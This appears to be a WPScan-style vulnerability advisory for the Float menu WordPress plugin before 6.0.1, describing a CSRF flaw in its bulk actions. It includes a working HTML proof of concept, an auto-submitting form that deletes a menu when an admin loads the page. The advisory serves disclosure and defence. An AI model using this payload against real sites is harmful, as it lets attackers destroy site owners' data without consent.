WordPress Plugin Vulnerabilities
Float menu < 6.0.1 - Menu Deletion via CSRF
Description
The plugin does not have CSRF check in its bulk actions, which could allow attackers to make logged in admin delete arbitrary menu via a CSRF attack.
Proof of Concept
Make a logged in admin open one a page with the code below, this will make them delete the menu with ID 1: <body onload="document.forms[0].submit()"> <form action="https://example.com/wp-admin/admin.php?page=float-menu&action=delete-items&action2=delete-items" method="POST"> <input type="text" name="ID" value="1"/> <input type="submit" value="submit"> </form> </body>
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
Miscellaneous
Original Researcher
Erwan LR (WPScan)
Submitter
Erwan LR (WPScan)
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2024-04-11 (about 1 months ago)
Added
2024-04-11 (about 1 months ago)
Last Updated
2024-04-11 (about 1 months ago)